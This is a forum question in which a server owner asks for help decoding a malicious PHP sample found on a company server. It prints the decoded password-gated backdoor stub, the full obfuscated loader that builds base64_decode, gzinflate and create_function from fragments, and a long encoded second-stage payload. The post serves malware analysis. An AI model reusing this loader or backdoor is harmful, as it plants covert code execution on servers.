# Decoding PHP obfuscated payload

Tags: php, assembly, reverse-engineering, bytecode, decoding

Recently I found a malicious PHP payload on my company's server. The code seems to be encoded into two strings `claster` and `x64`. The `claster` string decodes to the following

```
$svan = "_" . substr(md5($_SERVER['HTTP_HOST']), 0, 3);
if(isset($_REQUEST['_mg'])) 
    $hsh = substr(md5($_REQUEST['_mg']), 0, 16); 
else if(isset($_COOKIE[$svan]))
    $hsh = $_COOKIE[$svan]; 
    
    
if(!empty($hsh)) 
    return array($hsh, '861398');

echo '<form action="" method="post"><input type="text" name="_mg"><input type="submit" value=">>"></form>';
```

I was unable to decode the `x64` string. Using the same decoding method, I get garbage. If it is some sort of byte-code being added to the stack how do I decompile it into readable assembly? The whole script is as follows.

Thank you.

```
<?php
class Foo {
    function __construct() {
        $module = $this->stack($this->claster);
        $module = $this->tx($this->backend($module));
        $module = $this->point($module);
        $this->conf($module[0], $module[1]);
    }
    
    function conf($debug, $move) {
        $this->zx = $debug;
        $this->move = $move;
        $this->x64 = $this->stack($this->x64);
        $this->x64 = $this->backend($this->x64);
        $this->x64 = $this->mv();
        if(strpos($this->x64, $this->zx) !== false)
            $this->point($this->x64);
    }

    function dx($move, $memory, $debug) {
        if(strlen($debug) != 0) {
            for($i = 0; $i < strlen($memory); $i++)
                $memory[$i] = ($memory[$i] ^ $debug[$i % strlen($debug)]);
        }
        return $memory;
    }
   
    function backend($str) {
        $stable = $this->backend[3].$this->backend[1]. (16/2*16/2) .$this->backend[2].$this->backend[0];
        $stable = @$stable($str);
        return $stable;
    }

    function tx($str) {
        $stable = $this->tx[4].$this->tx[0].$this->tx[3].$this->tx[2].$this->tx[1];
        $stable = @$stable($str);
        return $stable;
    }
    
    function mv() {
        $this->access = $this->dx($this->move, $this->x64, $this->zx);
        $this->access = $this->tx($this->access);
        return $this->access;
    }
    
    function point($ls) {
        $stable = $this->cache[1].$this->cache[2].$this->cache[0];
        $view = @$stable('', $ls);
        return $view();
    }
    
    function stack($in) {
        $stable = $this->code[1].$this->code[2].$this->code[0];
        return $stable("\r\n", "", $in);
    }
     
    var $load;
    var $tx = array('in', 'e', 'at', 'fl', 'gz');
    var $cache = array('ction', 'creat', 'e_fun');
    var $backend = array('ode', 'e', '_dec', 'bas');
    var $code = array('ace', 'str_', 'repl');
     
    var $x64 = "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
